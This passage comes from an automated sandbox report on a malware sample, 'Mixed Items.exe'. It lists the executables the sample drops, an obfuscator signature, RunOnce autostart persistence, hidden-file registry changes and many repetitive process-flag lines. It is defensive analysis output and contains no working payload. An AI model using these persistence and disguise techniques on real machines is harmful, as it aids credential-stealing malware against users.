                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                        Source: Mixed Items.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: AdvancedRun.exe, 00000007.00000002.268206463.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000009.00000000.266715806.000000000040C000.00000002.00020000.sdmp
                        Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: hawkgoods.exe
                        Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: hawkgoods.exe
                        Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: hawkgoods.exe

                        Data Obfuscation:

                        Binary contains a suspicious time stamp
                        Source: initial sample | Static PE information: 0xEA799C72 [Sat Aug 28 12:54:10 2094 UTC]
                        Yara detected Beds Obfuscator
                        Source: Yara match | File source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000019.00000003.313769407.00000000037B0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000001F.00000002.476632403.00000000004D2000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000001F.00000000.312425541.00000000004D2000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe, type: DROPPED
                        Source: Yara match | File source: 31.0.Matiexgoods.exe.4f277c.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 31.2.Matiexgoods.exe.4f277c.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 31.0.Matiexgoods.exe.4d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 31.2.Matiexgoods.exe.4d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPE
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe | Code function: 7_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe | Code function: 7_2_0040B550 push eax; ret
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe | Code function: 7_2_0040B50D push ecx; ret
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe | Code function: 9_2_0040B550 push eax; ret
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe | Code function: 9_2_0040B50D push ecx; ret
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00375939 push eax; mov dword ptr [esp], edx
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00378BE1 push es; ret
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00375CF0 push eax; mov dword ptr [esp], edx
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00378DE1 push es; ret
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00378E21 push eax; mov dword ptr [esp], ecx
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_003B5960 push ebp; ret
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_003B5948 push esp; ret
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_003B3B38 pushfd ; retn 0036h
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_003B3B08 push esp; retn 0036h
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00E25870 push eax; mov dword ptr [esp], edx
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00E26028 push eax; mov dword ptr [esp], edx
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00E28FC1 push eax; mov dword ptr [esp], ecx
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 30_2_00530712 push eax; ret
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 30_2_0050BA9D push eax; ret
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 30_2_00D1A0F7 push cs; retf
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 30_2_00D1A083 push cs; retf
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 30_2_00D1A16B push cs; retf
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 30_2_07700773 push 69EBC360h; ret
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 30_2_0770064F push 69EBC310h; ret
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 30_2_0770089F push 69EBC3B0h; ret

                        Persistence and Installation Behavior:

                        Drops PE files with benign system names
                        Source: C:\Users\user\Desktop\Mixed Items.exe | File created: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe
                        Drops executables to the windows directory (C:\Windows) and starts them
                        Source: C:\Windows\explorer.exe | Executable created and started: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe
                        Source: C:\Users\user\Desktop\Mixed Items.exe | File created: C:\Users\user\AppData\Local\Temp\Purchase Order.exe
                        Source: C:\Users\user\Desktop\Mixed Items.exe | File created: C:\Users\user\AppData\Local\Temp\origigoods40.exe
                        Source: C:\Users\user\Desktop\Mixed Items.exe | File created: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe
                        Source: C:\Users\user\Desktop\Mixed Items.exe | File created: C:\Users\user\AppData\Local\Temp\origigoods20.exe
                        Source: C:\Users\user\Desktop\Mixed Items.exe | File created: C:\Users\user\AppData\Local\Temp\hawkgoods.exe
                        Source: C:\Users\user\Desktop\Mixed Items.exe | File created: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe

                        Boot Survival:

                        Creates an autostart registry key pointing to binary in C:\Windows
                        Source: C:\Users\user\Desktop\Mixed Items.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce tvQKHpPrzFBMmr
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe | Code function: 7_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,

                        Hooking and other Techniques for Hiding and Protection:

                        Changes the view of files in windows explorer (hidden files and folders)
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe | Code function: 7_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                        Source: C:\Users\user\Desktop\Mixed Items.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
